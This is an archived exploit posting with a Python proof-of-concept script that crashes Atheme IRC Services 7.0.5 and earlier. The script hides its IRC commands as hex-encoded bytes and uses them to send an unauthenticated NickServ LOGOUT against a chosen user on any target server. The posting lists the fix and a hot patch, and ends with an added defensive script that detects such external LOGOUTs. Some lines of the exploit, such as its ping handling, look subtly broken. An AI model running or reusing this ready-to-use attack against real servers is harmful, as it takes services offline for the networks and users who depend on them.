
Atheme IRC Services 7.0.5 Denial Of Service

Posted Jan 17, 2013
Authored by Aph3x, UberLame, O_O, Apetrick

This denial of service proof of concept exploit causes a core dump in Atheme IRC Services versions 7.0.5 and below through the external logout handling in logout.c, which is enabled by default.

tags | exploit, denial of service, proof of concept
MD5 | 5fecdf22359d929fc112d070cac5628a

#!/usr/bin/python3
###################################################################################
# Monday, January 13, 2013
#
#
#
# _ _ .__ .__
# __| || |_| | ____ ____ |__| ____ ____
# \ __ / | _/ __ \ / ___\| |/ _ \ / \
# | || || |_\ ___// /_/ > ( <_> ) | \
# /_ ~~ _\____/\___ >___ /|__|\____/|___| /
# |_||_| \/_____/ \/
# http://www.zempirians.com
#
# 00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#
#
# -=[ Atheme - IRC Services Daemon ] =-
#
# [P]roof [o]f [C]oncept, Denial of Service
#
#
#
#
###################################################################################
# # T E A M #
# #######################
#
# O_O .....> Sent To Play All Alone <3
# UberLame .....> For Providing More Sweet, Sweet Cycles
# Aph3x .....> For Being Awesome
# Apetrick .....> For Not Letting Me Play With Him
#
###################################################################################
#
# ~~! SHOUT OUTS !~~
#
# a heyoz Eurydemus
# nikka l1nd BinaryTENSHi
# syk Gatsby
#
# ~~! Special Thanks !~~
#
# Packet Storm Security (www.packetstormsecurity.com) for archiving our
# concepts in order to help secure and educate those who read them.
#
###################################################################################
# SUMMARY #
################
#
# Bug Fix: [12/20/12]: https://github.com/atheme/atheme/commit/1aaa9e8f1d0b0b67b36c2a6318c71beaa7f39194
#
# Improper implementation of the logout command, results in a segfault
# when an unauthenticated user tries to deauth another authenticated user.
#
################
# VULNERABLE #
################
#
# Atheme Services up to 7.0.5 [and with logout.c loaded (by default)]
#
################
# CVE #
################
#
# [ No CVE Has Been Reported ]
#
################
# PATCH #
################
#
# - Proper Fix
# - Update To Current Version From GitHub
#
# - Hot Patch
# - Unload nickserv/logout
# > /quote operserv modunload nickserv/logout
# $ !services.global! Module nickserv/logout unloaded.
# $ -OperServ- Module nickserv/logout unloaded.
#
###################################################################################
# # #
# # H O W - T O #
# # #
# #######################
#
# Provide the Target: Server, Nickname, Password and Optionally the Port, and the
# script will deliver the staged payload...
#
# [!USE/]$ ./<file>.py -t <server> -P <port> -n <nickname> -p <password>
#
###################################################################################
from argparse import ArgumentParser
import socket

# DIRTY HACK TO CONVERT STRINGS TO HEX
def toHex( string_data ):
    return ''.join(''.join([ hex( ord( ch ) ) for ch in string_data ]).split( '0x' ))

def deploy( sock, target, port, nick, passwd ):
    try:
        sock.connect(( target, int( port ) ))
    except:
        print( "\t[-] Payload Deployment Failed!" )
        exit()

    sock.send( b'\x4e\x49\x43\x4b\x20\x5f\x7a\x65\x6d\x70\x30\x64\x61\x79\x5f\x0d\x0a' )
    sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45' + \
               b'\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20\x3c\x33' + \
               b'\x0d\x0a' )

    while True:
        host_data = str( sock.recv(4096).strip() )

        if ' 396 ' in host_data:
            sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4c4f474f555420{}20{}0d0a'.format( \
                       toHex( nick ), toHex( passwd ) ) ) )

            print( '\t[+] Payload Deployed! <3' )
            break


    sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
    return sock.close()

def stage( target, port, nick, passwd ):
    sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
    p_sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )

    try:
        sock.connect(( target, int( port ) ))
    except:
        print( "[-] Failed To Connect To {}".format( target ) )
        exit()

    sock.send( bytes.fromhex( '4e49434b20{}0d0a'.format( toHex( nick ) ) ) )
    sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48' + \
               b'\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20' + \
               b'\x3c\x33\x0d\x0a' )

    while True:
        host_data = str( sock.recv( 8096 ).strip() )

        if ' 396 ' in host_data:
            sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a524547495354455220' + \
                       '{}2064657673407a656d70697269616e732e636f6d0d0a0d0a'.format( toHex( passwd ) ) ) )

            sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4944454e5449465920{}0d0a'.format( toHex( passwd ) ) ) )

            print( '\t[+] Staging Successful, Deploying Payload Against Target {}'.format( target ) )
            deploy( p_sock, target, port, nick, passwd )
            break

        try:
            msg = host_data.split()
            if msg[0].lower() is 'ping':
                sock.send( b"PONG {}\r\n".format( msg[1] ) )
        except:
            pass

    sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
    sock.close()


if __name__ == '__main__':
    parser = ArgumentParser( description='#legion Atheme IRC Services DoS' )

    parser.add_argument( '-t', '--target', dest='target', help='IRCD Server To Connect On' )
    parser.add_argument( '-P', '--port', dest='port', default=6667, help='Port To Connect On' )

    parser.add_argument( '-n', '--nick', dest='nick', default='zemp0day', help='Nick To Use' )
    parser.add_argument( '-p', '--pass', dest='passwd', default='yad0pmez', help='Password To Use' )

    args = parser.parse_args()

    if args.target is None:
        parser.print_help()
        exit()

    stage( args.target, args.port, args.nick, args.passwd )
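
Detection sketch for operators who cannot update or unload nickserv/logout right away. This is an added example, not part of the original proof of concept or of Atheme: it flags a NickServ LOGOUT that names a target account and comes from a connection that has not identified, which is the condition the summary above describes. The (connection id, raw client line) input format, the function names and the sample traffic are assumptions constructed for illustration.

```python
# Added example (not from the PoC or from Atheme). Input is assumed to be
# client-to-server IRC lines tagged with a connection id, e.g. taken from a
# proxy log or a packet capture. SAMPLE below is constructed.

def parse_nickserv(raw):
    """Return (COMMAND, args) if raw is a PRIVMSG addressed to NickServ, else None."""
    line = raw.strip()
    if line.startswith(':'):                      # drop an optional message prefix
        _, _, line = line.partition(' ')
    verb, _, rest = line.partition(' ')
    if verb.upper() != 'PRIVMSG':
        return None
    target, _, text = rest.lstrip().partition(' ')
    if target.split('@', 1)[0].lower() != 'nickserv':   # also accept NickServ@host
        return None
    text = text.lstrip()
    if text.startswith(':'):                      # trailing-parameter marker
        text = text[1:]
    words = text.split()
    if not words:
        return None
    return words[0].upper(), words[1:]


def find_external_logouts(events):
    """Flag LOGOUT <target> ... sent by connections that never sent IDENTIFY."""
    identified = set()
    alerts = []
    for conn, raw in events:
        parsed = parse_nickserv(raw)
        if parsed is None:
            continue
        cmd, args = parsed
        if cmd == 'IDENTIFY':
            # Client side only: the attempt is assumed to have succeeded.
            # Sessions authenticated by other means will look unidentified here.
            identified.add(conn)
        elif cmd == 'LOGOUT' and args and conn not in identified:
            alerts.append({'conn': conn, 'target': args[0]})  # password is not stored
    return alerts


SAMPLE = [  # constructed traffic
    ('c1', 'NICK alice'),
    ('c1', 'PRIVMSG NickServ :IDENTIFY constructed-pass'),
    ('c1', 'PRIVMSG NickServ :LOGOUT'),                        # normal self logout
    ('c2', 'NICK mallory'),
    ('c2', 'PRIVMSG NICKSERV :LOGOUT alice constructed-pass'),  # external, unidentified
    ('c3', 'PRIVMSG nickserv :logout'),                        # no target: ignored
    ('c3', 'PRIVMSG #chan :LOGOUT alice x'),                   # not sent to NickServ
]

if __name__ == '__main__':
    for alert in find_external_logouts(SAMPLE):
        print('external LOGOUT from unidentified connection:', alert)
```

An alert on a server still running 7.0.5 or older with nickserv/logout loaded is a reason to check for a services core dump and to apply the fix or the hot patch listed in the PATCH section.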
